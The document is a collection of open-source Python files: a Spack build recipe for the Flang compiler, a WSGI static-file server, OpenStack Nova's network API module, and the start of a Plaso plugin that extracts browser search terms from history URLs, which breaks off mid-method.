# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU Lesser General Public License (as
# published by the Free Software Foundation) version 2.1, February 1999.
#
# This program is distributed in the hope that it will be useful, but
# WITHOUT ANY WARRANTY; without even the IMPLIED WARRANTY OF
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the terms and
# conditions of the GNU Lesser General Public License for more details.
#
# You should have received a copy of the GNU Lesser General Public
# License along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temple Place, Suite 330, Boston, MA 02111-1307 USA
##############################################################################
from spack import *
import os
class Flang(CMakePackage):
"""Flang is a Fortran compiler targeting LLVM."""
homepage = "https://github.com/flang-compiler/flang"
url = "https://github.com/flang-compiler/flang/archive/flang_20180612.tar.gz"
git = "https://github.com/flang-compiler/flang.git"
version('develop', branch='master')
version('20180612', '62284e26214eaaff261a922c67f6878c')
depends_on('llvm@flang-develop', when='@develop')
depends_on('llvm@flang-20180612', when='@20180612 target=x86_64')
# LLVM version specific to OpenPOWER.
depends_on('llvm@flang-ppc64le-20180612', when='@20180612 target=ppc64le')
depends_on('pgmath@develop', when='@develop')
depends_on('pgmath@20180612', when='@20180612')
def cmake_args(self):
options = [
'-DWITH_WERROR=OFF',
'-DCMAKE_C_COMPILER=%s' % os.path.join(
self.spec['llvm'].prefix.bin, 'clang'),
'-DCMAKE_CXX_COMPILER=%s' % os.path.join(
self.spec['llvm'].prefix.bin, 'clang++'),
'-DCMAKE_Fortran_COMPILER=%s' % os.path.join(
self.spec['llvm'].prefix.bin, 'flang'),
'-DFLANG_LIBOMP=%s' % find_libraries(
'libomp', root=self.spec['llvm'].prefix.lib)
]
return options
@run_after('install')
def post_install(self):
# we are installing flang in a path different from llvm, so we
# create a wrapper with -L for e.g. libflangrti.so and -I for
# e.g. iso_c_binding.mod. -B is needed to help flang to find
# flang1 and flang2. rpath_arg is needed so that executables
# generated by flang can find libflang later.
flang = os.path.join(self.spec.prefix.bin, 'flang')
with open(flang, 'w') as out:
out.write('#!/bin/bash\n')
out.write(
'{0} -I{1} -L{2} -L{3} {4}{5} {6}{7} -B{8} "$@"\n'.format(
self.spec['llvm'].prefix.bin.flang,
self.prefix.include, self.prefix.lib,
self.spec['pgmath'].prefix.lib,
self.compiler.fc_rpath_arg, self.prefix.lib,
self.compiler.fc_rpath_arg,
self.spec['pgmath'].prefix.lib, self.spec.prefix.bin))
out.close()
chmod = which('chmod')
chmod('+x', flang)
def setup_environment(self, spack_env, run_env):
# to find llvm's libc++.so
spack_env.set('LD_LIBRARY_PATH', self.spec['llvm'].prefix.lib)
run_env.set('FC', join_path(self.spec.prefix.bin, 'flang'))
run_env.set('F77', join_path(self.spec.prefix.bin, 'flang'))
run_env.set('F90', join_path(self.spec.prefix.bin, 'flang'))
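# For illustration only: with the recipe above, the generated ``bin/flang``
# wrapper ends up looking roughly like the following. All paths are
# placeholders for the actual install prefixes, and the rpath flag depends on
# the compiler in use (with a GCC-style compiler it expands to -Wl,-rpath,<dir>).
#
#   #!/bin/bash
#   /path/to/llvm/bin/flang -I/path/to/flang/include \
#       -L/path/to/flang/lib -L/path/to/pgmath/lib \
#       -Wl,-rpath,/path/to/flang/lib -Wl,-rpath,/path/to/pgmath/lib \
#       -B/path/to/flang/bin "$@"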
|
krafczyk/spack
|
var/spack/repos/builtin/packages/flang/package.py
|
Python
|
lgpl-2.1
| 3,969
| 0.000756
|
"""A WSGI application that simply serves up files from the file system.
.. warning::
This is an early version of this module. It has no tests, limited
documentation, and is subject to major changes.
Configuration Options::
[wsgi_fs]
call = brim.wsgi_fs.WSGIFS
# path = <path>
# The request path to match and serve; any paths that do not begin
# with this value will be passed on to the next WSGI app in the
# chain. Default: /
# serve_path = <path>
# The local file path containing files to serve.
"""
"""Copyright and License.
Copyright 2014 Gregory Holt
Licensed under the Apache License, Version 2.0 (the "License"); you may
not use this file except in compliance with the License. You may obtain
a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License.
"""
import mimetypes
import os
import time
from cgi import escape
from brim import http
MONTH_ABR = (
'Jan', 'Feb', 'Mar', 'Apr', 'May', 'Jun', 'Jul', 'Aug', 'Sep', 'Oct',
'Nov', 'Dec')
WEEKDAY_ABR = ('Mon', 'Tue', 'Wed', 'Thu', 'Fri', 'Sat', 'Sun')
def http_date_time(when):
"""Returns a date and time formatted as per HTTP RFC 2616."""
gmtime = time.gmtime(when)
return '%s, %02d %3s %4d %02d:%02d:%02d GMT' % (
WEEKDAY_ABR[gmtime.tm_wday], gmtime.tm_mday,
MONTH_ABR[gmtime.tm_mon - 1], gmtime.tm_year, gmtime.tm_hour,
gmtime.tm_min, gmtime.tm_sec)
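# A minimal usage sketch illustrating the RFC 2616 format produced above.
#
#   http_date_time(0)
#   # -> 'Thu, 01 Jan 1970 00:00:00 GMT'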
def _openiter(path, chunk_size, total_size):
left = total_size
with open(path, 'rb') as source:
while True:
chunk = source.read(min(chunk_size, left))
if not chunk:
break
left -= len(chunk)
yield chunk
if left >= chunk_size:
chunk = ' ' * chunk_size
while left >= chunk_size:
left -= chunk_size
yield chunk
if left:
yield ' ' * left
class WSGIFS(object):
"""A WSGI app for serving up files from the file system.
See :py:mod:`brim.wsgi_fs` for more information.
:param name: The name of the app.
:param parsed_conf: The conf result from :py:meth:`parse_conf`.
:param next_app: The next WSGI app in the chain.
"""
def __init__(self, name, parsed_conf, next_app):
self.name = name
"""The name of the app."""
self.next_app = next_app
"""The next WSGI app in the chain."""
self.path = parsed_conf['path']
"""The request path to match and serve.
Any paths that do not begin with this value will be passed on to
the next WSGI app in the chain. The attribute will have leading
and trailing forward slashes removed.
"""
self.serve_path = parsed_conf['serve_path']
"""The local file path containing files to serve."""
def __call__(self, env, start_response):
"""Handles incoming WSGI requests.
Requests that start with the configured path simply serve up any
files under the configured location on the file system. Other
requests are passed on to the next WSGI app in the chain.
:param env: The WSGI env as per the spec.
:param start_response: The WSGI start_response as per the spec.
:returns: Calls *start_response* and returns an iterable as per
the WSGI spec.
"""
path = os.path.normpath(env['PATH_INFO'].strip('/'))
if path == self.path:
path = '.'
elif path.startswith(self.path + '/'):
path = path[len(self.path) + 1:]
if not path:
path = '.'
elif self.path:
return self.next_app(env, start_response)
if path == '..' or path.startswith('..' + os.path.sep):
return http.HTTPForbidden()(env, start_response)
path = os.path.join(self.serve_path, path)
if not os.path.exists(path):
return http.HTTPNotFound()(env, start_response)
if os.path.isdir(path):
if not env['PATH_INFO'].endswith('/'):
return http.HTTPMovedPermanently(
headers={'Location': env['PATH_INFO'] + '/'})(
env, start_response)
dirpath = path
path = os.path.join(path, 'index.html')
if not os.path.exists(path):
return self.listing(dirpath, env, start_response)
content_type = mimetypes.guess_type(path)[0] or \
'application/octet-stream'
stat = os.stat(path)
if not stat.st_size:
    start_response(
        '204 No Content',
        [('Content-Length', '0'), ('Content-Type', content_type)])
    return ''
start_response(
'200 OK',
[('Content-Length', str(stat.st_size)),
('Content-Type', content_type),
('Last-Modified',
http_date_time(min(stat.st_mtime, time.time())))])
if env['REQUEST_METHOD'] == 'HEAD':
return ''
return _openiter(path, 65536, stat.st_size)
def listing(self, path, env, start_response):
if not path.startswith(self.serve_path + '/'):
return http.HTTPForbidden()(env, start_response)
rpath = '/' + self.path + '/' + path[len(self.serve_path) + 1:]
epath = escape(rpath)
body = (
'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 '
'Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">\n'
'<html>\n'
' <head>\n'
' <title>Listing of %s</title>\n'
' <style type="text/css">\n'
' h1 {font-size: 1em; font-weight: bold;}\n'
' th {text-align: left; padding: 0px 1em 0px 1em;}\n'
' td {padding: 0px 1em 0px 1em;}\n'
' a {text-decoration: none;}\n'
' .colsize {text-align: right;}\n'
' </style>\n'
' </head>\n'
' <body>\n'
' <h1 id="title">Listing of %s</h1>\n'
' <table id="listing">\n'
' <tr id="heading">\n'
' <th class="colname">Name</th>\n'
' <th class="colsize">Size</th>\n'
' <th class="coldate">Date</th>\n'
' </tr>\n' % (epath, epath))
if env['PATH_INFO'].count('/') > 1:
body += (
' <tr id="parent" class="item">\n'
' <td class="colname"><a href="../">../</a></td>\n'
' <td class="colsize"> </td>\n'
' <td class="coldate"> </td>\n'
' </tr>\n')
listing = sorted(os.listdir(path))
for item in listing:
itempath = os.path.join(path, item)
if os.path.isdir(itempath):
body += (
' <tr class="item subdir">\n'
' <td class="colname"><a href="%s">%s</a></td>\n'
' <td class="colsize"> </td>\n'
' <td class="coldate"> </td>\n'
' </tr>\n' % (http.quote(item), escape(item)))
for item in listing:
itempath = os.path.join(path, item)
if os.path.isfile(itempath):
ext = os.path.splitext(item)[1].lstrip('.')
size = os.path.getsize(itempath)
mtime = os.path.getmtime(itempath)
body += (
' <tr class="item %s">\n'
' <td class="colname"><a href="%s">%s</a></td>\n'
' <td class="colsize">'
'<script type="text/javascript">'
'document.write(new Number(%s).toLocaleString());'
'</script></td>\n'
' <td class="coldate">'
'<script type="text/javascript">'
'document.write(new Date(%s * 1000).toLocaleString());'
'</script></td>\n'
' </tr>\n' %
('ext' + ext, http.quote(item), escape(item), size, mtime))
body += (
' </table>\n'
' </body>\n'
'</html>\n')
start_response('200 OK', {
'content-type': 'text/html; charset=UTF-8',
'content-length': str(len(body))}.items())
return [body]
@classmethod
def parse_conf(cls, name, conf):
"""Translates the overall server configuration.
The conf is translated into an app-specific configuration dict
suitable for passing as ``parsed_conf`` in the
:py:class:`WSGIFS` constructor.
See the overall docs of :py:mod:`brim.wsgi_fs` for
configuration options.
:param name: The name of the app, indicates the app's section in
the overall configuration for the server.
:param conf: The :py:class:`brim.conf.Conf` instance
representing the overall configuration of the server.
:returns: A dict suitable for passing as ``parsed_conf`` in the
:py:class:`WSGIFS` constructor.
"""
parsed_conf = {
'path': conf.get(name, 'path', '/').strip('/'),
'serve_path': conf.get_path(name, 'serve_path').rstrip('/')}
if not parsed_conf['serve_path']:
raise Exception('[%s] serve_path must be set' % name)
return parsed_conf
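# A minimal configuration sketch, following the [wsgi_fs] section shown in
# the module docstring; the paths are illustrative only.
#
#   [wsgi_fs]
#   call = brim.wsgi_fs.WSGIFS
#   path = /static
#   serve_path = /var/www/static
#
# parse_conf would then return:
#
#   {'path': 'static', 'serve_path': '/var/www/static'}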
|
gholt/python-brim
|
brim/wsgi_fs.py
|
Python
|
apache-2.0
| 9,657
| 0.000518
|
# Copyright (c) 2011 X.commerce, a business unit of eBay Inc.
# Copyright 2010 United States Government as represented by the
# Administrator of the National Aeronautics and Space Administration.
# Copyright 2013 IBM Corp.
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
import functools
from oslo.config import cfg
from nova.compute import flavors
from nova import exception
from nova.i18n import _
from nova.network import base_api
from nova.network import floating_ips
from nova.network import model as network_model
from nova.network import rpcapi as network_rpcapi
from nova import objects
from nova.objects import base as obj_base
from nova.openstack.common import log as logging
from nova import policy
from nova import utils
CONF = cfg.CONF
LOG = logging.getLogger(__name__)
def wrap_check_policy(func):
"""Check policy corresponding to the wrapped methods prior to execution."""
@functools.wraps(func)
def wrapped(self, context, *args, **kwargs):
action = func.__name__
check_policy(context, action)
return func(self, context, *args, **kwargs)
return wrapped
def check_policy(context, action):
target = {
'project_id': context.project_id,
'user_id': context.user_id,
}
_action = 'network:%s' % action
policy.enforce(context, _action, target)
class API(base_api.NetworkAPI):
"""API for doing networking via the nova-network network manager.
This is a pluggable module - other implementations do networking via
other services (such as Neutron).
"""
def __init__(self, **kwargs):
self.network_rpcapi = network_rpcapi.NetworkAPI()
helper = utils.ExceptionHelper
# NOTE(vish): this local version of floating_manager has to convert
# ClientExceptions back since they aren't going over rpc.
self.floating_manager = helper(floating_ips.LocalManager())
super(API, self).__init__(**kwargs)
@wrap_check_policy
def get_all(self, context):
"""Get all the networks.
If it is an admin user then api will return all the
networks. If it is a normal user and nova Flat or FlatDHCP
networking is being used then api will return all
networks. Otherwise api will only return the networks which
belong to the user's project.
"""
if "nova.network.manager.Flat" in CONF.network_manager:
project_only = "allow_none"
else:
project_only = True
try:
return objects.NetworkList.get_all(context,
project_only=project_only)
except exception.NoNetworksFound:
return []
@wrap_check_policy
def get(self, context, network_uuid):
return objects.Network.get_by_uuid(context.elevated(), network_uuid)
@wrap_check_policy
def create(self, context, **kwargs):
return self.network_rpcapi.create_networks(context, **kwargs)
@wrap_check_policy
def delete(self, context, network_uuid):
return self.network_rpcapi.delete_network(context, network_uuid, None)
@wrap_check_policy
def disassociate(self, context, network_uuid):
network = self.get(context, network_uuid)
objects.Network.disassociate(context, network.id,
host=True, project=True)
@wrap_check_policy
def get_fixed_ip(self, context, id):
return objects.FixedIP.get_by_id(context, id)
@wrap_check_policy
def get_fixed_ip_by_address(self, context, address):
return objects.FixedIP.get_by_address(context, address)
@wrap_check_policy
def get_floating_ip(self, context, id):
if not utils.is_int_like(id):
raise exception.InvalidID(id=id)
return objects.FloatingIP.get_by_id(context, id)
@wrap_check_policy
def get_floating_ip_pools(self, context):
return objects.FloatingIP.get_pool_names(context)
@wrap_check_policy
def get_floating_ip_by_address(self, context, address):
return objects.FloatingIP.get_by_address(context, address)
@wrap_check_policy
def get_floating_ips_by_project(self, context):
return objects.FloatingIPList.get_by_project(context,
context.project_id)
@wrap_check_policy
def get_floating_ips_by_fixed_address(self, context, fixed_address):
floating_ips = objects.FloatingIPList.get_by_fixed_address(
context, fixed_address)
return [str(floating_ip.address) for floating_ip in floating_ips]
@wrap_check_policy
def get_instance_id_by_floating_address(self, context, address):
fixed_ip = objects.FixedIP.get_by_floating_address(context, address)
if fixed_ip is None:
return None
else:
return fixed_ip.instance_uuid
@wrap_check_policy
def get_vifs_by_instance(self, context, instance):
vifs = objects.VirtualInterfaceList.get_by_instance_uuid(context,
instance.uuid)
for vif in vifs:
if vif.network_id is not None:
network = objects.Network.get_by_id(context, vif.network_id,
project_only='allow_none')
vif.net_uuid = network.uuid
return vifs
@wrap_check_policy
def get_vif_by_mac_address(self, context, mac_address):
vif = objects.VirtualInterface.get_by_address(context,
mac_address)
if vif.network_id is not None:
network = objects.Network.get_by_id(context, vif.network_id,
project_only='allow_none')
vif.net_uuid = network.uuid
return vif
@wrap_check_policy
def allocate_floating_ip(self, context, pool=None):
"""Adds (allocates) a floating ip to a project from a pool."""
return self.floating_manager.allocate_floating_ip(context,
context.project_id, False, pool)
@wrap_check_policy
def release_floating_ip(self, context, address,
affect_auto_assigned=False):
"""Removes (deallocates) a floating ip with address from a project."""
return self.floating_manager.deallocate_floating_ip(context, address,
affect_auto_assigned)
def disassociate_and_release_floating_ip(self, context, instance,
floating_ip):
"""Removes (deallocates) and deletes the floating ip.
This api call was added to allow this to be done in one operation
if using neutron.
"""
address = floating_ip['address']
if floating_ip.get('fixed_ip_id'):
try:
self.disassociate_floating_ip(context, instance, address)
except exception.FloatingIpNotAssociated:
msg = ("Floating ip %s has already been disassociated, "
"perhaps by another concurrent action.") % address
LOG.debug(msg)
# release ip from project
return self.release_floating_ip(context, address)
@wrap_check_policy
@base_api.refresh_cache
def associate_floating_ip(self, context, instance,
floating_address, fixed_address,
affect_auto_assigned=False):
"""Associates a floating ip with a fixed ip.
Ensures floating ip is allocated to the project in context.
Does not verify ownership of the fixed ip. Caller is assumed to have
checked that the instance is properly owned.
"""
orig_instance_uuid = self.floating_manager.associate_floating_ip(
context, floating_address, fixed_address, affect_auto_assigned)
if orig_instance_uuid:
msg_dict = dict(address=floating_address,
instance_id=orig_instance_uuid)
LOG.info(_('re-assign floating IP %(address)s from '
'instance %(instance_id)s') % msg_dict)
orig_instance = objects.Instance.get_by_uuid(context,
orig_instance_uuid)
# purge cached nw info for the original instance
base_api.update_instance_cache_with_nw_info(self, context,
orig_instance)
@wrap_check_policy
@base_api.refresh_cache
def disassociate_floating_ip(self, context, instance, address,
affect_auto_assigned=False):
"""Disassociates a floating ip from fixed ip it is associated with."""
return self.floating_manager.disassociate_floating_ip(context, address,
affect_auto_assigned)
@wrap_check_policy
@base_api.refresh_cache
def allocate_for_instance(self, context, instance, vpn,
requested_networks, macs=None,
security_groups=None,
dhcp_options=None):
"""Allocates all network structures for an instance.
:param context: The request context.
:param instance: nova.objects.instance.Instance object.
:param vpn: A boolean, if True, indicate a vpn to access the instance.
:param requested_networks: A dictionary of requested_networks,
Optional value containing network_id, fixed_ip, and port_id.
:param macs: None or a set of MAC addresses that the instance
should use. macs is supplied by the hypervisor driver (contrast
with requested_networks which is user supplied).
:param security_groups: None or security groups to allocate for
instance.
:param dhcp_options: None or a set of key/value pairs that should
determine the DHCP BOOTP response, eg. for PXE booting an instance
configured with the baremetal hypervisor. It is expected that these
are already formatted for the neutron v2 api.
See nova/virt/driver.py:dhcp_options_for_instance for an example.
:returns: network info as from get_instance_nw_info() below
"""
# NOTE(vish): We can't do the floating ip allocation here because
# this is called from compute.manager which shouldn't
# have db access so we do it on the other side of the
# rpc.
flavor = flavors.extract_flavor(instance)
args = {}
args['vpn'] = vpn
args['requested_networks'] = requested_networks
args['instance_id'] = instance.uuid
args['project_id'] = instance.project_id
args['host'] = instance.host
args['rxtx_factor'] = flavor['rxtx_factor']
args['macs'] = macs
args['dhcp_options'] = dhcp_options
nw_info = self.network_rpcapi.allocate_for_instance(context, **args)
return network_model.NetworkInfo.hydrate(nw_info)
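    # A rough calling sketch, assuming a compute-manager style caller; the
    # variable names below are illustrative only.
    #
    #   nw_info = network_api.allocate_for_instance(
    #       context, instance, vpn=False,
    #       requested_networks=None, macs=None,
    #       security_groups=None, dhcp_options=None)
    #   # nw_info is a network_model.NetworkInfo hydrated from the RPC result.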
@wrap_check_policy
def deallocate_for_instance(self, context, instance,
requested_networks=None):
"""Deallocates all network structures related to instance."""
# NOTE(vish): We can't do the floating ip deallocation here because
# this is called from compute.manager which shouldn't
# have db access so we do it on the other side of the
# rpc.
if not isinstance(instance, obj_base.NovaObject):
instance = objects.Instance._from_db_object(context,
objects.Instance(), instance)
self.network_rpcapi.deallocate_for_instance(context, instance=instance,
requested_networks=requested_networks)
# NOTE(danms): Here for neutron compatibility
def allocate_port_for_instance(self, context, instance, port_id,
network_id=None, requested_ip=None):
raise NotImplementedError()
# NOTE(danms): Here for neutron compatibility
def deallocate_port_for_instance(self, context, instance, port_id):
raise NotImplementedError()
# NOTE(danms): Here for neutron compatibility
def list_ports(self, *args, **kwargs):
raise NotImplementedError()
# NOTE(danms): Here for neutron compatibility
def show_port(self, *args, **kwargs):
raise NotImplementedError()
@wrap_check_policy
@base_api.refresh_cache
def add_fixed_ip_to_instance(self, context, instance, network_id):
"""Adds a fixed ip to instance from specified network."""
flavor = flavors.extract_flavor(instance)
args = {'instance_id': instance['uuid'],
'rxtx_factor': flavor['rxtx_factor'],
'host': instance['host'],
'network_id': network_id}
nw_info = self.network_rpcapi.add_fixed_ip_to_instance(
context, **args)
return network_model.NetworkInfo.hydrate(nw_info)
@wrap_check_policy
@base_api.refresh_cache
def remove_fixed_ip_from_instance(self, context, instance, address):
"""Removes a fixed ip from instance from specified network."""
flavor = flavors.extract_flavor(instance)
args = {'instance_id': instance['uuid'],
'rxtx_factor': flavor['rxtx_factor'],
'host': instance['host'],
'address': address}
nw_info = self.network_rpcapi.remove_fixed_ip_from_instance(
context, **args)
return network_model.NetworkInfo.hydrate(nw_info)
@wrap_check_policy
def add_network_to_project(self, context, project_id, network_uuid=None):
"""Force adds another network to a project."""
self.network_rpcapi.add_network_to_project(context, project_id,
network_uuid)
@wrap_check_policy
def associate(self, context, network_uuid, host=base_api.SENTINEL,
project=base_api.SENTINEL):
"""Associate or disassociate host or project to network."""
network = self.get(context, network_uuid)
if host is not base_api.SENTINEL:
if host is None:
objects.Network.disassociate(context, network.id,
host=True, project=False)
else:
network.host = host
network.save()
if project is not base_api.SENTINEL:
if project is None:
objects.Network.disassociate(context, network.id,
host=False, project=True)
else:
objects.Network.associate(context, project,
network_id=network.id, force=True)
@wrap_check_policy
def get_instance_nw_info(self, context, instance, **kwargs):
"""Returns all network info related to an instance."""
result = self._get_instance_nw_info(context, instance)
# NOTE(comstud): Don't update API cell with new info_cache every
# time we pull network info for an instance. The periodic healing
# of info_cache causes too many cells messages. Healing the API
# will happen separately.
base_api.update_instance_cache_with_nw_info(self, context, instance,
result, update_cells=False)
return result
def _get_instance_nw_info(self, context, instance):
"""Returns all network info related to an instance."""
flavor = flavors.extract_flavor(instance)
args = {'instance_id': instance['uuid'],
'rxtx_factor': flavor['rxtx_factor'],
'host': instance['host'],
'project_id': instance['project_id']}
nw_info = self.network_rpcapi.get_instance_nw_info(context, **args)
return network_model.NetworkInfo.hydrate(nw_info)
@wrap_check_policy
def validate_networks(self, context, requested_networks, num_instances):
"""validate the networks passed at the time of creating
the server.
Return the number of instances that can be successfully allocated
with the requested network configuration.
"""
if requested_networks:
self.network_rpcapi.validate_networks(context,
requested_networks)
# Neutron validation checks and returns how many of num_instances
# instances can be supported by the quota. For Nova network
# this is part of the subsequent quota check, so we just return
# the requested number in this case.
return num_instances
def create_pci_requests_for_sriov_ports(self, context,
pci_requests,
requested_networks):
"""Check requested networks for any SR-IOV port request.
Create a PCI request object for each SR-IOV port, and add it to the
pci_requests object that contains a list of PCI request object.
"""
# This is NOOP for Nova network since it doesn't support SR-IOV.
pass
@wrap_check_policy
def get_instance_uuids_by_ip_filter(self, context, filters):
"""Returns a list of dicts in the form of
{'instance_uuid': uuid, 'ip': ip} that matched the ip_filter
"""
return self.network_rpcapi.get_instance_uuids_by_ip_filter(context,
filters)
@wrap_check_policy
def get_dns_domains(self, context):
"""Returns a list of available dns domains.
These can be used to create DNS entries for floating ips.
"""
return self.network_rpcapi.get_dns_domains(context)
@wrap_check_policy
def add_dns_entry(self, context, address, name, dns_type, domain):
"""Create specified DNS entry for address."""
args = {'address': address,
'name': name,
'dns_type': dns_type,
'domain': domain}
return self.network_rpcapi.add_dns_entry(context, **args)
@wrap_check_policy
def modify_dns_entry(self, context, name, address, domain):
"""Create specified DNS entry for address."""
args = {'address': address,
'name': name,
'domain': domain}
return self.network_rpcapi.modify_dns_entry(context, **args)
@wrap_check_policy
def delete_dns_entry(self, context, name, domain):
"""Delete the specified dns entry."""
args = {'name': name, 'domain': domain}
return self.network_rpcapi.delete_dns_entry(context, **args)
@wrap_check_policy
def delete_dns_domain(self, context, domain):
"""Delete the specified dns domain."""
return self.network_rpcapi.delete_dns_domain(context, domain=domain)
@wrap_check_policy
def get_dns_entries_by_address(self, context, address, domain):
"""Get entries for address and domain."""
args = {'address': address, 'domain': domain}
return self.network_rpcapi.get_dns_entries_by_address(context, **args)
@wrap_check_policy
def get_dns_entries_by_name(self, context, name, domain):
"""Get entries for name and domain."""
args = {'name': name, 'domain': domain}
return self.network_rpcapi.get_dns_entries_by_name(context, **args)
@wrap_check_policy
def create_private_dns_domain(self, context, domain, availability_zone):
"""Create a private DNS domain with nova availability zone."""
args = {'domain': domain, 'av_zone': availability_zone}
return self.network_rpcapi.create_private_dns_domain(context, **args)
@wrap_check_policy
def create_public_dns_domain(self, context, domain, project=None):
"""Create a public DNS domain with optional nova project."""
args = {'domain': domain, 'project': project}
return self.network_rpcapi.create_public_dns_domain(context, **args)
@wrap_check_policy
def setup_networks_on_host(self, context, instance, host=None,
teardown=False):
"""Setup or teardown the network structures on hosts related to
instance.
"""
host = host or instance['host']
# NOTE(tr3buchet): host is passed in cases where we need to setup
# or teardown the networks on a host which has been migrated to/from
# and instance['host'] is not yet or is no longer equal to
args = {'instance_id': instance['id'],
'host': host,
'teardown': teardown}
self.network_rpcapi.setup_networks_on_host(context, **args)
def _get_multi_addresses(self, context, instance):
try:
fixed_ips = objects.FixedIPList.get_by_instance_uuid(
context, instance['uuid'])
except exception.FixedIpNotFoundForInstance:
return False, []
addresses = []
for fixed in fixed_ips:
for floating in fixed.floating_ips:
addresses.append(floating.address)
return fixed_ips[0].network.multi_host, addresses
@wrap_check_policy
def migrate_instance_start(self, context, instance, migration):
"""Start to migrate the network of an instance."""
flavor = flavors.extract_flavor(instance)
args = dict(
instance_uuid=instance['uuid'],
rxtx_factor=flavor['rxtx_factor'],
project_id=instance['project_id'],
source_compute=migration['source_compute'],
dest_compute=migration['dest_compute'],
floating_addresses=None,
)
multi_host, addresses = self._get_multi_addresses(context, instance)
if multi_host:
args['floating_addresses'] = addresses
args['host'] = migration['source_compute']
self.network_rpcapi.migrate_instance_start(context, **args)
@wrap_check_policy
def migrate_instance_finish(self, context, instance, migration):
"""Finish migrating the network of an instance."""
flavor = flavors.extract_flavor(instance)
args = dict(
instance_uuid=instance['uuid'],
rxtx_factor=flavor['rxtx_factor'],
project_id=instance['project_id'],
source_compute=migration['source_compute'],
dest_compute=migration['dest_compute'],
floating_addresses=None,
)
multi_host, addresses = self._get_multi_addresses(context, instance)
if multi_host:
args['floating_addresses'] = addresses
args['host'] = migration['dest_compute']
self.network_rpcapi.migrate_instance_finish(context, **args)
|
vmthunder/nova
|
nova/network/api.py
|
Python
|
apache-2.0
| 23,489
| 0.000341
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
#
# Copyright 2013 The Plaso Project Authors.
# Please see the AUTHORS file for details on individual authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""A plugin that extracts browser history from events."""
import collections
import logging
import urllib
from plaso import filters
from plaso.analysis import interface
from plaso.lib import event
from plaso.lib import eventdata
def ScrubLine(line):
"""Scrub the line of most obvious HTML codes.
An attempt at taking a line and swapping all instances
of %XX which represent a character in hex with its
unicode character.
Args:
line: The string that we are about to "fix".
Returns:
String that has its %XX hex codes swapped for text.
"""
if not line:
return ''
try:
return unicode(urllib.unquote(str(line)), 'utf-8')
except UnicodeDecodeError:
logging.warning(u'Unable to decode line: {0:s}'.format(line))
return line
class FilterClass(object):
"""A class that contains all the parser functions."""
@classmethod
def _GetBetweenQEqualsAndAmbersand(cls, string):
"""Return back string that is defined 'q=' and '&'."""
if 'q=' not in string:
return string
_, _, line = string.partition('q=')
before_and, _, _ = line.partition('&')
if not before_and:
return line
return before_and.split()[0]
@classmethod
def _SearchAndQInLine(cls, string):
"""Return a bool indicating if the words q= and search appear in string."""
return 'search' in string and 'q=' in string
@classmethod
def GoogleSearch(cls, url):
"""Return back the extracted string."""
if not cls._SearchAndQInLine(url):
return
line = cls._GetBetweenQEqualsAndAmbersand(url)
if not line:
return
return line.replace('+', ' ')
@classmethod
def YouTube(cls, url):
"""Return back the extracted string."""
return cls.GenericSearch(url)
@classmethod
def BingSearch(cls, url):
"""Return back the extracted string."""
return cls.GenericSearch(url)
@classmethod
def GenericSearch(cls, url):
"""Return back the extracted string from a generic search engine."""
if not cls._SearchAndQInLine(url):
return
return cls._GetBetweenQEqualsAndAmbersand(url).replace('+', ' ')
@classmethod
def Yandex(cls, url):
"""Return back the results from Yandex search engine."""
if 'text=' not in url:
return
_, _, line = url.partition('text=')
before_and, _, _ = line.partition('&')
if not before_and:
return
yandex_search_url = before_and.split()[0]
return yandex_search_url.replace('+', ' ')
@classmethod
def DuckDuckGo(cls, url):
"""Return back the extracted string."""
if 'q=' not in url:
return
return cls._GetBetweenQEqualsAndAmbersand(url).replace('+', ' ')
@classmethod
def Gmail(cls, url):
"""Return back the extracted string."""
if 'search/' not in url:
return
_, _, line = url.partition('search/')
first, _, _ = line.partition('/')
second, _, _ = first.partition('?compose')
return second.replace('+', ' ')
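# A minimal illustration of the extractors above; the URLs are made up.
#
#   FilterClass.GoogleSearch(
#       'https://www.google.com/search?q=forensic+timeline&hl=en')
#   # -> 'forensic timeline'
#   FilterClass.DuckDuckGo('https://duckduckgo.com/?q=plaso+plugin')
#   # -> 'plaso plugin'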
class AnalyzeBrowserSearchPlugin(interface.AnalysisPlugin):
"""Analyze browser search entries from events."""
NAME = 'browser_search'
# Indicate that we do not want to run this plugin during regular extraction.
ENABLE_IN_EXTRACTION = False
# Here we define filters and callback methods for all hits on each filter.
FILTERS = (
(('url iregexp "(www.|encrypted.|/)google." and url contains "search"'),
'GoogleSearch'),
('url contains "youtube.com"', 'YouTube'),
(('source is "WEBHIST" and url contains "bing.com" and url contains '
'"search"'), 'BingSearch'),
('url contains "mail.google.com"', 'Gmail'),
(('source is "WEBHIST" and url contains "yandex.com" and url contains '
'"yandsearch"'), 'Yandex'),
('url contains "duckduckgo.com"', 'DuckDuckGo')
)
def __init__(self, pre_obj, incoming_queue, outgoing_queue):
"""Constructor for the browser history plugin."""
super(AnalyzeBrowserSearchPlugin, self).__init__(
pre_obj, incoming_queue, outgoing_queue)
self._filter_dict = {}
self._counter = collections.Counter()
for filter_str, call_back in self.FILTERS:
filter_obj = filters.GetFilter(filter_str)
call_back_obj = getattr(FilterClass, call_back, None)
if filter_obj and call_back_obj:
self._filter_dict[filter_obj] = (call_back, call_back_obj)
def ExamineEvent(self, event_object):
"""Take an EventObject and send it through analysis."""
# This event requires an URL attribute.
